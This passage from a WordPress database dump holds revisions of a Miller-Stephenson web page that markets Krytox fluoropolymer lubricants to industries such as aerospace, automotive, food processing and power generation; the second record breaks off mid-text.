INSERT INTO `wp_posts` VALUES (2130, 2, '2016-09-28 19:59:00', '2016-09-28 19:59:00', '<p style="text-align: center;"><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:59:00', '2016-09-28 19:59:00', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2131, 2, '2016-09-28 19:59:32', '2016-09-28 19:59:32', '<p style="text-align: center;"><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n<a name="aerospace"></a>\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have 